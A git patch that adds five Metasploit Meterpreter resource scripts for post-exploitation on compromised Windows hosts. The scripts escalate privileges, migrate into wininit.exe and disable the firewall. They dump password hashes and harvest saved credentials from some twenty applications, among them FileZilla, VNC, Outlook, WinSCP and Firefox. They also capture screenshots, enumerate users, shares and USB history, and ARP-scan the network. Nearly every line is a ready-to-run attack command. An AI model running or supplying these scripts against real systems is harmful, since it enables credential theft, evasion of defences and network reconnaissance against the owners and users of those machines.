From 84e3080bc7e8ac20de87f42a872c18116786b70b Mon Sep 17 00:00:00 2001 From: Edo -maland- Date: Thu, 1 Sep 2016 11:26:39 +0700 Subject: [PATCH] Added post exploitation --- postexploit/auto_migrate+killfirewall.rc | 3 +++ postexploit/cred_dump.rc | 29 ++++++++++++++++++++++++ postexploit/fast_migrate.rc | 4 ++++ postexploit/gather.rc | 18 +++++++++++++++ postexploit/sysinfo.rc | 4 ++++ 5 files changed, 58 insertions(+) create mode 100644 postexploit/auto_migrate+killfirewall.rc create mode 100644 postexploit/cred_dump.rc create mode 100644 postexploit/fast_migrate.rc create mode 100644 postexploit/gather.rc create mode 100644 postexploit/sysinfo.rc diff --git a/postexploit/auto_migrate+killfirewall.rc b/postexploit/auto_migrate+killfirewall.rc new file mode 100644 index 0000000..0e6930f --- /dev/null +++ b/postexploit/auto_migrate+killfirewall.rc @@ -0,0 +1,3 @@ +run post/windows/manage/migrate + +run post/windows/manage/killfw diff --git a/postexploit/cred_dump.rc b/postexploit/cred_dump.rc new file mode 100644 index 0000000..5a9655c --- /dev/null +++ b/postexploit/cred_dump.rc @@ -0,0 +1,29 @@ +getsystem +sysinfo +show_mount +screenshot -v -p dump.jpeg -v true +run post/windows/gather/enum_logged_on_users +run post/windows/gather/hashdump +run post/windows/gather/credential_collector +run post/windows/gather/credentials/wsftp_client +run post/windows/gather/credentials/winscp +run post/windows/gather/credentials/windows_autologin +run post/windows/gather/credentials/vnc +run post/windows/gather/credentials/trillian +run post/windows/gather/credentials/total_commander +run post/windows/gather/credentials/smartftp +run post/windows/gather/credentials/outlook +run post/windows/gather/credentials/nimbuzz +run post/windows/gather/credentials/mremote +run post/windows/gather/credentials/imail +run post/windows/gather/credentials/idm +run post/windows/gather/credentials/flashfxp +run post/windows/gather/credentials/filezilla_server +run post/windows/gather/credentials/meebo +run post/windows/gather/credentials/coreftp +run post/windows/gather/credentials/imvu +run post/windows/gather/credentials/epo_sql +run post/windows/gather/enum_ie +run post/multi/gather/pidgin_cred +run post/multi/gather/firefox_creds +run post/multi/gather/filezilla_client_cred diff --git a/postexploit/fast_migrate.rc b/postexploit/fast_migrate.rc new file mode 100644 index 0000000..0432e70 --- /dev/null +++ b/postexploit/fast_migrate.rc @@ -0,0 +1,4 @@ +getsystem +run migrate -n wininit.exe +sysinfo +getuid diff --git a/postexploit/gather.rc b/postexploit/gather.rc new file mode 100644 index 0000000..1614a3f --- /dev/null +++ b/postexploit/gather.rc @@ -0,0 +1,18 @@ +getsystem +sysinfo +screenshot -v -p gather.jpeg -v true +run post/multi/gather/env +enumdesktops +run post/windows/gather/enum_logged_on_users +run post/windows/gather/enum_shares +show_mount +run post/multi/escalate/cups_root_file_read +run post/windows/gather/dumplinks +run post/windows/gather/enum_snmp +run post/windows/gather/arp_scanner +netstat +arp +run post/windows/gather/usb_history +run post/multi/gather/firefox_creds +run post/windows/gather/credential_collector +run post/windows/gather/enum_applications diff --git a/postexploit/sysinfo.rc b/postexploit/sysinfo.rc new file mode 100644 index 0000000..34a5151 --- /dev/null +++ b/postexploit/sysinfo.rc @@ -0,0 +1,4 @@ +sysinfo +arp +getuid +pwd